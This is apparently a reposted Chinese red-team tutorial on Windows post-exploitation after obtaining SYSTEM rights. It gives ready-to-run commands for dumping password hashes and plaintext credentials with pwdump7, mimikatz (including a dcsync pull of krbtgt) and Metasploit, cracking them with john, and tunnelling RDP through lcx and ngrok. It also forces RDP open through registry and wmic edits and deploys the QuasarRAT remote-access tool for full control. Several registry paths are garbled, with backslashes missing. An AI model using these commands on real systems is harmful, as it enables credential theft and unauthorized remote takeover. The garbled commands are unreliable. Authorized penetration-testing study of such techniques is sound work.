hw结束了,各位师傅回回神,请持续性充电
以下转载自:安全鸭
在提权成功拿到system权限之后,下一步就应该为内网渗透做准备。其中很重要的一步就是读取设备本地的hash值。工具读取hash的本质都是利用system权限去读取Windows的SAM文件。在Windows2012版本以下,还可以通过工具直接去读取内存里面的明文密码,Windows 2012之后不能再读内存中的明文,只能用mimiakatz等工具读取hash值然后进行破解。
一、使用pwdump7获取hash
pwdump7是一款本地hash读取工具,需要系统权限运行,直接在CMD命令窗口运行即可。测试win7、Win03、window08 均可读取hash值:
Win7

Windows2003:
拿到hash直接破解:
二、mimikatz抓取hash
项目地址:https://github.com/gentilkiwi/mimikatz/releases
mimikatz需要高权限运行才能发挥,至少是administrator权限 ,抓取密码的命令需要system权限
1.抓取密码需要先进行提权
#提升权限(从administrator提升到system)
privilege::debug
2.抓取hash
#获取当前在线用户的明文密码(需要高权限运行)
sekurlsa::logonpasswords
#获取当前此计算机存在过用户的NTLMHASH
lsadump::lsa /patch
3.mimikatz其他命令
#导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份
lsadump::sam SYSTEM.hiv
#通过内存文件获取口令
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
#拉取 rd.adsecurity.org 域中的 KRBTGT 用户帐户的密码数据
lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt
#拉取 lab.adsecurity.org 域中 ADSDC03 域控制器的计算机帐户的密码数据
lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$
4.pass.exe读取明文密码
window2008用getpassword.exe
三、MSF抓取hash
1.hashdump抓取hash并破解
将得到的hash值复制hash到新文件利用john工具进行破解:
john a.hash
# 破解hash
2.smart-hashdump模块
use windows/gather/smart_hashdump
set session x
run
3.MSF+mimikatz
#查看权限
getuid
#尝试获取system权限,一般都是失败,可利用溢出漏洞进行提权
getsystem
#加载mimiakatz
load mimikatz
#帮助
help mimikatz
#随便输入一个a模块让他报错会显示所有可用模块
mimikatz_command -f a::
#查看指定模块使用方法
mimikatz_command -f hash::
msv
kerberos
wdigest
mimikatz_command -f samdump::hashes
mimikatz_command -f handle::list
端口转发
LCX端口转发
1.本地监听
lcx.exe -listen 1111 11122
# 端口1111是目标主机连接本地的端口
# 端口11122是将接收到的服务器内容转发端口
2.端口转发
lcx.exe -slave 192.168.1.4 1111 127.0.0.1 3389
3.成功连接
4.远程连接
MSF端口转发
项目地址:https://www.ngrok.cc/
注册ngrock账号,启动转发。ngrock使用方法:MSF配合Ngrock穿透内网
1.建立会话。测试net service权限也可以转发端口
2.端口转发
portfwd add -l 1133 -p 3389 -r 127.0.0.1
#将目标3389转发到本地的1133端口
3.远程连接
rdesktop 127.0.0.1:1133
其他
在远程连接时总会遇见不可描述的各种疑难杂症,记录如下:
1.服务端口默认被修改
解决办法①:
#查询TermService对应PID和netstat查询的PID对应的端口号
tasklist /svc
netstat -ano | findstr PID
解决办法②:
#读取注册表查询终端端口PortNumber的值
REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber
备注:0xd3d=hex(3389)
解决办法③:nnmap探测(ms-wbt-server服务)
2.服务器未开启3389
解决办法:强开3389
#通用开3389:
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
#For Win2003&Win2008:
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# win2012/win08通用;win7前两条适用。winxp/win03未测验权限需要run as administrator:
wmic /namespace:rootcimv2 erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:rootcimv2 erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
3.服务器网络环境处于内网:
解决办法:端口转发
4.防护验证规则/IP或计算机名:
解决办法:找IP/计算机名白名单。如果真遇上这种情况又找不着白名单的话,在3389这一块算是交代了,可以换一种思路,上远控:
QuasarRAT远控
项目地址:https://github.com/quasar/QuasarRAT/release
2.开启监听
3.靶机执行payload,返回会话
需要靶机支持dotnet4.0环境,且使用管理员权限运行payload。
4.为所欲为
之前分享过的资料:
ctf web/ctf misc 学习资料,私聊公众号发送“ctf学习资料”会自动回复你下载链接;
hw期间分享过溯源思维脑图,私聊公众号发送“获取高清图”会自动回复你下载链接;
hw期间分享的个人收集的子域名字典,私聊公众号发送“获取子域名字典”会自动回复你下载链接;
一如既往的学习,一如既往的整理,一如即往的分享。感谢支持
扫描关注LemonSec
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论